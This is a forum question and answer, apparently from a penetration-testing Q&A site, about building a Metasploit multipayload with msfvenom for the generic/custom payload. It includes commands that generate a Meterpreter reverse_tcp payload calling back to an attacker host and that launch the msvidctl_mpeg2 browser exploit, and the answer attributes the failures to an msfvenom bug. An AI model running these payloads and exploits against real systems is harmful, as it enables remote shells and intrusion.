Metasploit generic/custom payload with a multipayload


I've been playing around with the newer MSF4 (Framework: 4.1.0-release.13988, Console: 4.1.0-release.13581) multipayload support using msfvenom and the custom/generic payload, but there seems to be a dearth of information on what the payload supports in terms of encodings and compatibility.

Basically I'm looking at how a server-side service can be shut down, then have the Meterpreter listen on its no-longer-bound port. (The exploit would come in on another port.)

Essentially I created a multipayload using msfvenom with the msgbox and Meterpreter back-to-back, as an exe, raw, and .rb. I've tried leaving the encoding setting alone, and setting it to None. (Note that the custom/generic payload .rb source says something about only allowing None encoding.)

c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom  -p windows/messagebox -f raw -e generic/none EXITFUNC=thread > test\msgbox.raw
c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p windows/meterpreter/reverse_tcp -f raw -e generic/none -t test/msgbox.raw -k LHOST=192.168.1.100 EXITFUNC=thread > test\msgterp.raw

I also tried it with EXITFUNC set to "none":

c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom  -p windows/messagebox -f raw -e generic/none EXITFUNC=none > test\msgbox.raw
c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p windows/meterpreter/reverse_tcp -f raw -e generic/none -t test/msgbox.raw -k LHOST=192.168.1.100 EXITFUNC=none > test\msgterp.raw

Then I need to write the raw multipayload to something that the generic/custom payload can use (note I've tried writing to raw, exe, and .rb formats):

c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p - -f exe > msf.exe < test\\msgterp.raw

Finally it's time to try the multipayload out with generic/custom (note that I reloaded the exploit each time before trying to set and exploit):

msf > use exploit/windows/browser/msvidctl_mpeg2
msf  exploit(msvidctl_mpeg2) > set PAYLOAD generic/custom
PAYLOAD => generic/custom

msf  exploit(msvidctl_mpeg2) > set PAYLOADSTR c:\\metasploit\\test\\msf.raw
PAYLOADSTR => c:\metasploit\test\msf.raw
msf  exploit(msvidctl_mpeg2) > exploit

[-] Exploit failed: No encoders encoded the buffer successfully.

msf  exploit(msvidctl_mpeg2) > set PAYLOADSTR c:\\metasploit\\test\\msf.exe
PAYLOADSTR => c:\metasploit\test\msf.exe
msf  exploit(msvidctl_mpeg2) > exploit

[-] Exploit failed: No encoders encoded the buffer successfully.

msf  exploit(msvidctl_mpeg2) > set PAYLOADFILE c:\\metasploit\\test\\msf.raw
PAYLOADFILE => c:\metasploit\test\msf.raw
msf  exploit(msvidctl_mpeg2) > exploit

[-] Exploit failed: No encoders encoded the buffer successfully.

msf  exploit(msvidctl_mpeg2) > set PAYLOADFILE c:\\metasploit\\test\\msf.exe
PAYLOADFILE => c:\metasploit\test\msf.exe
msf  exploit(msvidctl_mpeg2) > exploit

[-] Exploit failed: No encoders encoded the buffer successfully.

So I found an explanation of what the "No encoders encoded..." error is supposed to mean (http://en.wikibooks.org/wiki/Metasploit/Frequently_Asked_Questions). This is where stager payloads come in, I suppose.

Is the cause of the error the windows/msgbox payload because it's not staged? Or is it that multipayloads aren't staged? If it's the latter, then I can't see how multipayloads would ever work unless they were staged. Combining 2 payloads would likely be larger than a single payload.

Can someone please at least explain the encodings and formats that should be compatible with the generic/custom payload so I can rule that out? I've only found a couple of references to multipayload support.

Thanks in advance! I promise to reply with how I got this working once I do.

Solution

  • Sorry about the late answer.

    There was a bug in MSF 4.1 regarding msfvenom, not the generic/custom payload. The payloads I generated were definitely smaller than the 1024 bytes allowable. Here's a thread dedicated to it, where HDM himself suggests it's a bug:

    https://community.rapid7.com/thread/1332

    And the bug case that was logged along with the fix for msfvenom:

    http://dev.metasploit.com/redmine/issues/4714

    I just don't think anyone was using the multi-payload support. Don't be confused by my previous clunky use of msfvenom. I was desperate by the time I posted this question, so I included everything I thought the problem might be without getting into writing shellcode. I was on the verge of trying to learn how to write a 2-in-1 shellcode test when HDM admitted this was a bug, and I decided to go another route. (I grabbed the MSF Pro trial and set up a VPN pivot to solve my multi-hop test scenario.)

    Thanks for the response.